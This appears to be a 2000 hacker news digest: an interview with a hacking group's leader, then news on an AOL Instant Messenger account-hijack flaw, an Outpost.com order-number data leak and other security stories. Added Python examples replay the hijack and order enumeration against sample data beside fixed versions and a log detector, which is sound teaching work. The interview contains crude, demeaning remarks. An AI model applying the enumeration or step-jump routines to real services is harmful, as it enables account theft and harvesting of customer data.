=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Interview Of Valiant The Leader Of Halcon.
| http://www.halcon.com.au
----------------------------------------------

Background:

Halcon was founded in 1993 as a Bulletin Board System and by 1996 had grown to at least ten members. Still growing, in October 1996 the group took on the name Halcon Technologies, and in 1997 Valiant registered a business name, allowing them to register the halcon.com.au domain name.

Although the group was not widely known, on 22nd October 1999 Halcon was blamed for a massive hack on the Australian Republican Movement website. Despite denials and misquotations, the story was covered by news outlets, an example of which is at the following URL:

http://www.halcon.com.au/arm0001.html

Following this incident, Halcon received massive amounts of publicity (most of it unwanted), and Valiant claims that Halcon has become the most popular hacking group in Australia. It currently has 24 members and thousands of supporters. Having been misquoted once, Valiant has since denied all interviews to the press, including an offer from Channel Nine. QuadCon is therefore proud to present an exclusive, uncut interview with Valiant.

-------------------------------------------------------------------------------
The Interview
-------------

QuadCon: If you were a system administrator of a newly installed Slackware Linux machine and you had 20 minutes to secure it, what would you do?

Valiant: Go to all the available sites (www.halcon.com.au/links.html) that cater for that, and quickly grab and install as many patches for your software as are available. Close all services (especially fingerd) that aren't needed, relocate telnet to a different port (I know it breaches RFCs, but fuck it) and make sure that you don't adduser lamers. :)

QuadCon: What is the most common thing to hack to gain access to?

Valiant: Fingerd is the most exploitable feature on machines, the good old cracker's highway. Although these days it's neglected as a mode of system penetration; also a lot of sysadmins don't understand the point of finger anymore and remove it anyway. As for hacking, the best method available that I remember overusing would be a buffer overflow in a certain piece of software which makes calls to root. Flood the software, bang, down it goes and you have root. :)

QuadCon: Does the name Halcon have any relevance to you, and why did you choose it for the name of the group?

Valiant: Halcon .. well, I chose that many years ago, so I can't really remember why it was chosen, other than that it sounds funky. :P

QuadCon: How would you characterize the media coverage of you?

Valiant: Trivial and biased. They just want an 'evil hacker genius' who brags about how he hacked NASA; they don't really like me as basically I won't brag, and I prefer to explain how idiotic the consumers are for purchasing fucked computers, etc, and other consumer related problems.

QuadCon: What do you think about hacks done in your name -- for instance, the Australian Republican Movement hack?

Valiant: I wasn't expecting such media coverage on that topic; however they have no evidence against me, and I have yet to admit to even being born at this point in time. So fuck 'em all. :)

QuadCon: What's the biggest misconception perpetuated by Hollywood cybermovies?

Valiant: There is no such thing as a hot female hacker named Acid Burn who has pert tits and lips that would look very nice wrapped around my hard disk. :)

QuadCon: In your own words, define hacker.

Valiant: There's two meanings. I fall into both. The code hacker, who lives to program and does it the hard way, and the system hacker, who loves finding exploitable features in systems to gain access, does so, notifies the sysadmin and patches the hole.

QuadCon: What is your technical background? (Which platform do you prefer, PC/Mac? What is your online background? Do you do networking? Do you know programming languages, etc.)

Valiant: At the moment my preferred operating system is Windows 98, due to its usability and comprehensive system architecture, when it comes to personal use; for industrial things such as networking, I prefer any Linux distribution. I am a PC user, although I have a few old Apple Classics in my computer collection. I've been using the internet through BBS gateways for ten or more years. I network when I have to, but I used to work as a network engineer. As for programming languages, I have a bad memory and generally have to 'relearn' things when I need them; however it's more a refresh than a relearn. :)

QuadCon: I understand that hackers assume an online nickname to become known by - how did you acquire your nickname?

Valiant: I was seven years old when I logged onto a BBS using an audio coupler 900 bps modem at a friend's place. It asked for a handle; Valiant was my current Dungeons and Dragons character, so I typed it in sheepishly. I've been known by it ever since. :)

QuadCon: How would you portray system administrators?

Valiant: Fail-safe devices that take care of systems, that if programmed correctly would never need human assistance. :)

QuadCon: What do you think of ALOC, another Aussie hacking group?

Valiant: Who? :)

QuadCon: What is Halcon currently working on?

Valiant: Currently working on? We're currently working on the ultimate encyclopaedia of how to be slothful and lazy. :)

QuadCon: What would you like Halcon to be in the future?

Valiant: I don't know, that's a hard question really. I never wanted it to be anything to begin with; time has just made it bigger than I ever expected. Back when I was a kid and it first started, I never really thought it would exceed a BBS group of users who were of the same interests. Now it's almost like a religious cult for some. :)

QuadCon: Who in the world do you dislike most?

Valiant: Anyone with an IQ under 110. :) 100 is average, so I like people a tad over. The others should be neutered and shot.
:)

QuadCon: Any last comments?

Valiant: I like being a cunt-rag.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Special Thanks
--------------

Valiant of Halcon
http://www.halcon.com.au

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Support Us
----------

Please support us - we are looking for a fast permanent unix box to host a website with all our zines on. If you believe you can help, see the contact section below. Also if you know anyone who wants or deserves to be interviewed, also see the contact section below.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Contact
-------

I can be contacted on IRC irc.wiretapped.net or on the email address marena@iinet.net.au

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Copyright 1999 QuadCon

[This "how not to write a zine"-style document got this response from the people hosting the file (wiretapped.net):]

http://the.wiretapped.net/security/textfiles/quadcon/response.txt

@HWA

49.0 HNN: Jan 25: AIM Accounts Susceptible to Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AOL will always have problems of some sort, no matter what they do; the system is just too big and complex, and the operators do not know more than the basics of how the user interfaces work. Expect to see many more AOL/AIM etc. problems and exploits - Ed

Oxymoron: "AOL tech support"

From HNN http://www.hackernews.com/

contributed by no0ne

A group of teenagers has discovered a way to take over any AOL Instant Messenger account as long as they know the person's screen name. A staff tool that was picked up from AOL's proprietary online service lets them exploit a hole in AOL 5.0's registration process, allowing them to reset users' passwords. During the AOL 5.0 registration process, AOL asks for a person's screen name. The teenagers enter the screen name they want to have; when prompted for a password they make one up to get the "invalid password" message. AOL 5.0 then buffers the screen name within the registration process. The perpetrators then jump to another part of the registration process where AOL thinks the intruder is the rightful owner of the AIM screen name and permits the password to be reset. AOL says it is working to correct the problem.

C|Net
http://news.cnet.com/news/0-1005-200-1530654.html?dtn.head

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnews01

MSNBC
http://www.msnbc.com/news/361415.asp

Wired
http://www.wired.com/news/business/0,1367,33881,00.html

CNET; Hackers learn how to take over AOL IM accounts
By Courtney Macavinta
Staff Writer, CNET News.com
January 24, 2000, 4:30 p.m. PT

America Online Instant Messenger users could find their online identities stolen via a security hole that allows hackers to hijack their accounts through another popular service: AOL 5.0.

A small band of hackers has discovered a way to take over any AOL Instant Messenger (AIM) account as long as they have a person's screen name. By using an AOL staff tool they unearthed while poking around the company's proprietary online service, they exploit a public hole in the AOL 5.0 registration process that lets them reset AIM users' passwords.

Once the hackers do this handiwork, initial users of the screen names are locked out of their accounts, giving the hackers open access to users' "buddy lists" of other AIM users and the ability to maintain trial AOL 5.0 accounts under the same screen names, as confirmed by CNET News.com.

AOL spokesman Rich D'Amoto said he hasn't heard of any complaints about stolen AIM screen names, but that the company is looking into the issue and will try to track down the hackers.

"We're aware of the situation and we are deploying security measures to defeat the hackers," D'Amoto said.
More than 40 million people have registered AIM screen names and use the program to carry on short conversations or send quick alerts to their friends or co-workers. AIM users can set up private buddy lists and never have to share their screen names with people they don't know. But many users give up their names freely in chat rooms or through AIM's "find a buddy" feature, which lets users search for someone to talk with based on a common interest, such as books or religion.

The teen-age hackers who found the hole in AOL 5.0 say they have stolen more than a hundred names, such as "New York City." Some use the names they've seized to extract information about the person from friends and family. Mostly the ploy is a game.

"We do it if we've seen someone we don't like in a private chat room," one of the hackers said in an interview.

At one point, the high school senior said he tried to let AOL know about the hole. "If AOL would just listen to people like us instead of blowing us off and terminating our accounts, they could fix it," he said.

Security holes usually aren't kid's stuff to a major company such as AOL, however. In the wake of high-profile privacy breaches by way of human error and email-based attacks, AOL has been forced to take security seriously to ensure its more than 20 million members that their personal information, e-commerce transactions and communications are protected on its service.

AOL wants AIM registrants to feel safe, too; their frequent and consistent activity adds up to lucrative advertising dollars for AOL. And AOL's quality control and privacy measures will only become more important--and potentially harder to manage--as its acquisition of Time Warner takes shape.

AOL will likely try to close the loophole in the registration process that allows the hackers to assign a new password to the account. Here's how it works: At one point in the 5.0 registration process, AOL asks for a person's screen name. The hackers enter the screen name they intend to steal, but when asked for a password, they simply guess and get an "invalid password" message. The trick is that AOL has "buffered," or remembered, the screen name within the registration process. The hackers then use a tool that lets them jump to another part of the registration process. Once these steps have been taken, AOL thinks the hacker is the rightful owner of the AIM screen name and later on in the registration process permits the password to be reset.

Security experts say such abuses aren't rare.

"These software faults are more common than most people think; it's more common than we would like," said Elias Levy, of the consulting firm Security Focus. "Most companies, their first reaction is to deny the problem and then go into damage recovery mode and fix the problem without acknowledging it."

Although AIM users could simply register a new screen name, Levy said that having a name stolen could be more of a concern for people who use messenger or chat programs for professional reasons. "It can be nerve wracking if someone stole your online personality," he said.

AOL said that if a person has had their AIM screen name stolen, for now they can use the program's "forgot password" feature to have an email sent to the address they provided at registration that includes the account's current password. Then the original holder of the screen name can reset the password once again.

-=-

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Hackers impersonate AOL users
By Lisa Napoli, MSNBC
January 24, 2000 6:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdnntop

Since November, a group of teenagers say they have been stealing AOL Instant Messenger screen names and masquerading as their rightful owners.
The hackers sometimes act as imposters and pilfer credit card numbers and other personal data from friends and family of the exploited online users. The hackers demonstrated their method to MSNBC on Monday. According to a letter the hackers sent on Sunday to members of the technology press, they use the names "just for the pure joy of trying to ruin friendships by insulting friends who have no idea they are talking to a hacker and not the victim." The hackers say they have contacted the media because AOL (NYSE: AOL) had not responded to their notification of the security hole. An AOL spokesman, Rich D'Amato, said on Monday afternoon, "We are aware of the situation and are deploying security measures to defeat it. When hacker behavior crosses the line into illegal action, we'll certainly bring it to the attention of authorities." D'Amato would not specify how many people had been affected or pinpoint the time line, saying those details could affect the investigation. "AOL is so easy to abuse, it's pathetic," said TangentX, who says he is 17 years old and, along with two others, found the security hole this fall. They discussed it, he said, in special private chat rooms on AOL for hackers and use of the so-called "exploit" spread. He estimates that 400 names have been stolen to date. AOL press materials say that 45 million people have created AOL Instant Messenger screen names as of last August. The popular software allows online users to chat privately, almost in real time, with others who have the software. AOL also owns ICQ, another popular instant messaging program, which claims 50 million registered users. TangentX says he and others have found several ways to make an instant message screen name into an AOL account without the password. One involves resetting a password for a screen name through a security hole. The other involves taking a screen name, creating an AOL account for it and then changing the password.
When he was given a screen name on Monday afternoon by MSNBC, TangentX was able to access the account and send an instant message from the name in a matter of minutes. -=- MSNBC; Fuck em, check the link yourself. :-/ (No I don't like Micro$loth) -=- Wired; Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to change passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use the instant messaging software (AIM) outside of AOL are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected."
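The three stories above describe the same defect from different angles: the sign-up flow remembers ("buffers") the claimed screen name, the password step can fail without anything recording that it failed, and a tool that jumps to a later step finds the reset function trusting the buffered name alone. The following is an added example written for this issue, not AOL's code; the step names, the in-memory account store and the "New York City" sample account are assumptions for illustration. It puts a flow with that defect beside one that records proof of ownership and checks it at the reset step, and replays the reported trick against both.

```python
"""Added example, not AOL's code: a multi-step sign-up flow that buffers the
claimed screen name in session state and lets the client jump between steps,
as the articles describe, next to a version that gates the reset step on a
recorded proof of ownership. Step names, the account store and the
'New York City' sample account are assumptions for illustration."""
import hmac


def fresh_store():
    """Constructed sample account store: screen name -> password and contact email."""
    return {"New York City": {"password": "correct horse", "email": "owner@example.org"}}


def password_matches(stored, supplied):
    # Constant-time comparison on bytes; stands in for a real password hash check.
    return hmac.compare_digest(stored.encode(), supplied.encode())


class VulnerableSignup:
    """Remembers the screen name from step 1 but never records whether the
    password step actually succeeded, so a later step trusts the name alone."""

    def __init__(self, users):
        self.users = users
        self.session = {}

    def step_claim_name(self, name):
        self.session["screen_name"] = name            # buffered for later steps
        return "ask_password"

    def step_check_password(self, password):
        user = self.users.get(self.session.get("screen_name"))
        if user is None or not password_matches(user["password"], password):
            return "invalid password"                  # ... but the name stays buffered
        return "ok"

    def step_reset_password(self, new_password):
        # Reachable directly with a step-jumping tool; looks only at the buffered name.
        name = self.session.get("screen_name")
        if name not in self.users:
            return "no such name"
        self.users[name]["password"] = new_password
        return "reset"


class HardenedSignup(VulnerableSignup):
    """Same steps, but the privileged step checks that the earlier gate passed,
    and restarting the flow clears any proof obtained so far."""

    def step_claim_name(self, name):
        self.session = {"screen_name": name, "owner_verified": False}
        return "ask_password"

    def step_check_password(self, password):
        result = super().step_check_password(password)
        self.session["owner_verified"] = (result == "ok")
        return result

    def step_reset_password(self, new_password):
        if not self.session.get("owner_verified"):
            return "ownership not verified"            # the step-jump lands here
        return super().step_reset_password(new_password)


def hijack(flow_cls, target, guess="wrong guess", new_password="pwned"):
    """Replays the reported trick against a fresh store: claim the name, fail
    the password step, jump straight to reset. Returns (reset outcome, password now)."""
    users = fresh_store()
    flow = flow_cls(users)
    flow.step_claim_name(target)
    flow.step_check_password(guess)                   # 'invalid password' in both flows
    return flow.step_reset_password(new_password), users[target]["password"]


def owner_reset(flow_cls, target, password, new_password="rotated"):
    """The legitimate path: correct password, then reset, in order."""
    users = fresh_store()
    flow = flow_cls(users)
    flow.step_claim_name(target)
    flow.step_check_password(password)
    return flow.step_reset_password(new_password), users[target]["password"]


if __name__ == "__main__":
    print("vulnerable:", hijack(VulnerableSignup, "New York City"))
    print("hardened:  ", hijack(HardenedSignup, "New York City"))
    print("owner:     ", owner_reset(HardenedSignup, "New York City", "correct horse"))
```

The fix is not a check on the password step but on the reset step: every step that changes account state has to verify that the gate before it was actually passed in this session, and claiming a different name has to discard that proof. One further caveat on the remedy the ZDNN piece quotes: a "forgot password" feature that mails the account's current password can only work if the password is stored in recoverable form; the usual practice is to mail a single-use reset token instead.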
"AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." @HWA 50.0 HNN: Jan 25: Outpost Leaks Customer Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench By changing the order number in the URL users at Outpost.com are able to view the personal information, including the type of credit card used, of other users. An Outpost spokesperson said that the problem would be fixed immediately. (This type of problem is extremely old, it is surprising that such a large company as Outpost has this problem. This just further illuminates the need for effective e-commerce security.) Wired http://www.wired.com/news/technology/0,1282,33842,00.html Outpost Leaves Data Unguarded by Chris Oakes 1:25 p.m. 24.Jan.2000 PST While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too. He noticed that the long Web page address for his transaction included his order number, and decided to see what happened if he changed a digit to try and access other customers' records. The modified address pulled up the same detailed transaction summary for another customer's order number -- including a full range of sensitive, and valuable, personal data. "You can see someone's email address, their billing address, their shipping address, type of credit card they used, their order history -- everything they bought, everything they received, everything they're currently waiting for," Wynne said. In addition to exposing nuggets of information about individuals -- tying their email identity to their street address, and revealing recent purchases -- the security glitch could be exploited by marketers to build databases of target customers, said Wynne.
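What Wynne found is a lookup keyed only by a predictable identifier the client controls, with no check that the order belongs to the customer asking. The following is an added example written for this issue, not Outpost.com's code; the order records, customers, IP addresses, log lines and the /order?id= URL shape are constructed for illustration. It shows the unguarded lookup beside one bound to the logged-in customer, the two harvesting loops Wynne describes (walk nearby numbers; find everyone who bought a given product), and a check over access-log lines that catches the enumeration from the server side.

```python
"""Added example, not Outpost.com's code: an order-lookup endpoint keyed only
by the order number from the URL, next to a version that binds the lookup to
the logged-in customer, plus a log check for the enumeration Wynne describes.
The order records, customers, IP addresses and log lines are constructed
sample data; the /order?id= URL shape is an assumption."""
import re
from collections import defaultdict

# Constructed sample orders: order number -> record (no real customers).
ORDERS = {
    1001: {"customer": "alice", "email": "alice@example.org", "ship_to": "1 Main St",
           "card": "Visa", "items": ["PalmPilot"]},
    1002: {"customer": "bob", "email": "bob@example.org", "ship_to": "2 Oak Ave",
           "card": "MasterCard", "items": ["Modem"]},
    1003: {"customer": "carol", "email": "carol@example.org", "ship_to": "3 Elm Rd",
           "card": "Amex", "items": ["PalmPilot", "Stylus"]},
}


def view_order_vulnerable(order_number):
    """The number in the URL is the only key: whoever can guess it gets the record."""
    record = ORDERS.get(order_number)
    return dict(record) if record else None


def view_order_secure(session_user, order_number):
    """Authorization check: the record must belong to the authenticated customer.
    Missing and foreign orders get the same answer, so the endpoint does not
    confirm which numbers exist."""
    record = ORDERS.get(order_number)
    if record is None or record["customer"] != session_user:
        return None
    return dict(record)


def harvest(lookup, start, count):
    """Wynne's experiment: step through nearby numbers and keep the hits."""
    hits = {}
    for n in range(start, start + count):
        record = lookup(n)
        if record is not None:
            hits[n] = record["email"]
    return hits


def buyers_of(lookup, start, count, item):
    """The data-mining variant: everyone who bought a given product."""
    buyers = []
    for n in range(start, start + count):
        record = lookup(n)
        if record is not None and item in record["items"]:
            buyers.append(record["customer"])
    return sorted(buyers)


# Constructed access-log lines in common log format; 203.0.113.7 walks order numbers.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jan/2000:10:00:01 -0800] "GET /order?id=1001 HTTP/1.0" 200 512
203.0.113.7 - - [24/Jan/2000:10:00:02 -0800] "GET /order?id=1002 HTTP/1.0" 200 498
203.0.113.7 - - [24/Jan/2000:10:00:03 -0800] "GET /order?id=1003 HTTP/1.0" 200 530
203.0.113.7 - - [24/Jan/2000:10:00:04 -0800] "GET /order?id=1004 HTTP/1.0" 404 120
198.51.100.9 - - [24/Jan/2000:10:01:00 -0800] "GET /order?id=1002 HTTP/1.0" 200 498
198.51.100.9 - - [24/Jan/2000:10:05:00 -0800] "GET /order?id=1002 HTTP/1.0" 200 498
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET /order\?id=(?P<id>\d+) HTTP/1\.[01]" (?P<status>\d{3})'
)


def find_enumeration(log_text, min_distinct=3):
    """Flags clients that request several distinct order numbers: a customer
    re-checks one order, an enumerator walks many. Returns ip -> sorted numbers."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            seen[m["ip"]].add(int(m["id"]))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= min_distinct}


if __name__ == "__main__":
    print(harvest(view_order_vulnerable, 1000, 5))
    print(harvest(lambda n: view_order_secure("bob", n), 1000, 5))
    print(buyers_of(view_order_vulnerable, 1000, 5, "PalmPilot"))
    print(find_enumeration(SAMPLE_LOG))
```

Note that hiding or obscuring the number in the URL, which the article says most sites do, only raises the cost of guessing; the control that closes the hole is the ownership check in view_order_secure, and the enumeration check is what tells you whether anyone was walking the numbers before the fix went in.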
"I could set up a data-mining program that would check random [order] numbers and find out all people who bought PalmPilots at Outpost.com," he said. Outpost.com acknowledged the flaw Monday and said it would have the problem fixed by the end of the day. But the vulnerability did not represent a dramatic risk, the company said. Most commerce sites prevent the simple searching of their database by encrypting or otherwise preventing the data from appearing in URLs. "It shouldn't be there, but it is," said Outpost.com spokesman Craig Andrews. "It's sort of hidden buried away in the URL," he said, claiming that only hackers looking for holes would be able to find it. Furthermore, he said, while the hole revealed both personal and purchasing information, it did not betray credit card numbers or other vital financial information. "It's unfortunate that pricing and product information is there. But the other personal information is all over the place. You can go to a place like [Web information directory] 411 and get addresses and personal email." However, Andrews acknowledged that people generally volunteer the information in directory services, and purchasing information is not included. Ray Everett-Church, chief privacy officer at Alladvantage.com and longtime spam-watcher, said the flaw is more of a threat than Outpost portrayed it to be. "I would certainly consider this a threat to not only integrity of data privacy promises a site might make, but certainly to the kinds of confidence level that companies should be trying to instill in consumers," Everett-Church said. "It causes folks to question the security of these transactions and the advisability of entering into them in the first place." Was it an oversight that led to the hole? Technically, yes, but not really, said Outpost.com's Andrews. "Between management of the site and the software they use to manage orders, it was just something that hadn't come up....
It wasn't really an oversight by the textbook definition." Everett-Church said he doesn't think the public hears about personal data vulnerabilities nearly as often as they occur. "I think these sorts of Web ordering systems have these problems quite frequently -- probably more frequently than we realize. All it takes is a clever hacker to keep poking and prodding at the systems to find these kinds of weaknesses." @HWA 51.0 HNN: Jan 25: DeCSS Author Raided ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Zorro The National Authority for Investigation and Prosecution of Economic and Environmental Crime in Norway has raided the home of Jon Johansen of Steinsholt Norway. Jon is the author of the controversial software DeCSS. Authorities confiscated his computer and cellphone, they also questioned him for up to seven hours. Both Jon and his father have been charged with breaking the copyright act and the penal law which could result in up to 3 years in prison. Slashdot http://slashdot.org/articles/00/01/24/2024233.shtml VG - Norwegian http://www.vg.no/pub/vgart.hbs?artid=5712180 TV 2 - Norwegian http://www2.tv2.no/nyss/n2i.vis?par=70&par=1623664&ext=378097 @HWA 52.0 HNN: Jan 25: Solaris May Go Free and Open ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jay When Solaris 8 is unveiled Wednesday in New York it is expected that Sun will also announce that the software will be free as well as opening access to the software's source code. Solaris 8 is expected to ship in February. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
-------------------------------------------------------------- Sun fights Linux, WinNT with 'free Solaris' By Deborah Gage, Sm@rt Reseller January 24, 2000 8:58 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html?chkpt=zdhpnews01 Sun Microsystems Inc. is expected to eliminate licensing fees for Solaris 8 to boost its appeal against Linux and Microsoft Windows NT, say sources close to the company. Sun is expected to make its "free Solaris" campaign the centerpiece of its Solaris 8 unveiling, which takes place this Wednesday in New York City. At that event, Sun also is expected to announce it will open up access to Solaris 8 source code. Solaris 8 is due to ship in February, around the same time Microsoft is due to ship Windows 2000. McNealy: Set it free Sun CEO Scott McNealy has been laying the groundwork for the announcement for months by telling audiences that software is a service and should be free. McNealy recommended last year that the government require Microsoft to make free and open its application program interfaces, rather than break itself into pieces, as a preferred remedy in the current Department of Justice vs. Microsoft antitrust investigation. "Free" is a relative term, however. Sun in December eliminated fees for Java 2 Standard Edition but still requires developers to pay for compatibility tests required to maintain their licenses. And Linux advocates and other industry watchers have claimed that the Sun Community Source License is not as free or open as Linux and other open-source licenses are. Sun will pitch Solaris 8 against Microsoft's high-end Windows 2000 package called Windows 2000 Datacenter, which is in beta and won't be commercially available until midyear, at best. Sun in November announced a free early access version of Solaris 8. Sun is positioning Solaris 8 as the most scalable and reliable network operating system on the market. 
Microsoft, which stepped up its Windows 2000 marketing campaign within the past week, in anticipation of the Feb. 17 rollout of the product, is touting Windows 2000's reliability as its main selling point. Zander: We'll never do Linux Microsoft's not Sun's only worry. Sun must fend off growing encroachments by Linux, which not only is free but also is becoming more robust with help from Sun competitors IBM Corp., Intel Corp. and Hewlett-Packard Co. Sun President Ed Zander told financial analysts last week that Sun will never adopt Linux as its operating system but will instead "put every ounce of R&D we have into Solaris." "It amazes me to watch IBM and all those other companies chase Linux the way they did Windows NT five years ago," Zander said. Sun has been working for over a year to offer Solaris under the Sun Community Source License but was stymied by the fact that it didn't own all the intellectual property inside Solaris. SCSL is a quasi open-source license that requires developers to return bug fixes to Sun, maintain compatibility and pay fees to Sun when they ship binaries based on Sun source code. It is unclear how Sun has resolved its intellectual property issues. But that isn't stopping the company from working to get on the good side of the open-source community. Sun is sponsoring ApacheCon 2000, the first official conference of the Apache Software Foundation upcoming in March, and is helping with the Apache Foundation's Jakarta and Java Apache projects. @HWA 53.0 HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion For years DoD officials have claimed that the global eavesdropping network known as Echelon was nothing more than a myth fabricated by journalists. Now recently declassified papers by the NSA actually confirm the existence of the operation. 
The NSA Declassified http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB23/index.html (Go to the url theres a lot of material there - Ed) @HWA 54.0 HNN: Jan 25: Japan Needs US Help With Defacements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench On Monday Japan's Science and Technology Agency and Japan's Management and Coordination Agency had their web sites defaced. This is considered the first-ever defacement of a Japanese government computer system. Japanese officials have said that they will be seeking assistance from US officials in tracking down the perpetrators. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000125/wr/japan_hackers_1.html Tuesday January 25 12:44 AM ET Japan Says to Seek U.S. Help to Deal With Hackers TOKYO (Reuters) - Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Computer systems at Japan's Science and Technology Agency were raided on Monday and its homepage was replaced with derogatory messages insulting the Japanese in the first-ever hacking of a Japanese government computer system. Agency officials declined to give details of the derogatory messages. The homepage was also replaced with a direct access switch to adult magazine web sites, agency officials said. Several hours later, Japan's Management and Coordination Agency also discovered a similar incident at its Web site. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the incident, including possible help from Washington which was more advanced in dealing with hackers. ``The government must take all necessary measures including seeking help from the United States,'' Aoki told a regular news conference. An agency spokesman said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration.
@HWA 55.0 HNN: Jan 25: Car Radios Monitored by Marketers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Soon we'll have to wear implants in our penises so that condom manufacturers can collect stats on how often their product is used for fucking. - Ed From HNN http://www.hackernews.com/ contributed by Evil Wench Originally developed as a means to gather real time Radio ratings information, technology created by Alabama based MobilTrak is now being used by marketers. The road side devices home in on emissions from car radios to determine exactly what station they are tuned to. Now concert promoters are using the technology to determine what station concert attendees listen to as they park their cars when attending concerts. Wired http://www.wired.com/news/technology/0,1282,33799,00.html Your Ears Are Their Business by Noah Shachtman 3:00 a.m. 25.Jan.2000 PST Even in the car, there's no hiding from marketers' prying eyes -- and ears. Companies like concert mega-promoter SFX Entertainment are using a new device to find out what's being played on customers' radios as they pull into venue parking lots. The information is supposed to help businesses gauge the effectiveness of radio advertising campaigns. But the system -- built by Alabama start-up Mobiltrak and installed at 13 SFX locations in Los Angeles, Phoenix, Atlanta, and elsewhere -- is coming under fire from privacy experts. "Nobody would think that they're being monitored in a parking lot. And nobody would think that there's something of value in listening to a radio station while they're in that parking lot," said Brooklyn Law School professor Paul Schwartz. "But there is something of value here, and the people listening don't get any of that value. They're being polled without knowing they're in a poll."
By contrast, when the local supermarket videotapes your weekly grocery run, or Dell monitors your tech support call -- even when SFX tracks your visit to its Web site -- the companies let you know you're being observed. The major traditional measurement companies, like The Arbitron Company and Nielsen Media Research, pay a small stipend to the people they survey. Mobiltrak counters that such efforts aren't needed with their system. Individual cars aren't being tracked, they argue, so there's no invasion of an individual's privacy. "We can't link to a particular automobile. It's just not technically possible," claims Lucius Stone, Mobiltrak's director of sales and marketing. "It's a high-volume, random sample. It can only measure one radio at a time. And there's no way of telling which radio it is. It's most analogous to a traffic counter." The technology relies on a simple principle: every FM radio is not only a receiver but also an unintentional transmitter. The local oscillator in a superheterodyne receiver leaks a weak signal at a fixed offset (typically 10.7 MHz for FM broadcast) from the station to which it's tuned, so anyone who picks up that leakage can work out the station. That's why airlines ask passengers to turn off their radios during takeoff and landing: to prevent interference with pilots and air traffic controllers' communications. Mobiltrak picks up these RF emissions leaked from car radios' oscillators, and counts what stations are being played. Many in the privacy community fear that the temptation to use this information to breach established bounds of discretion will be too great for Mobiltrak to resist. "If it's merely aggregate information, not tied to an individual, then it's not really a concern," says Jason Catlett, president of consumer privacy group Junkbusters. "But there's an economic incentive to get down to the individual level, and a precedent for using the same technology to look at the individual householder." Like Mobiltrak, the British Broadcasting Corporation scrutinizes RF emissions. By law, British residents must have licenses for the television sets they own.
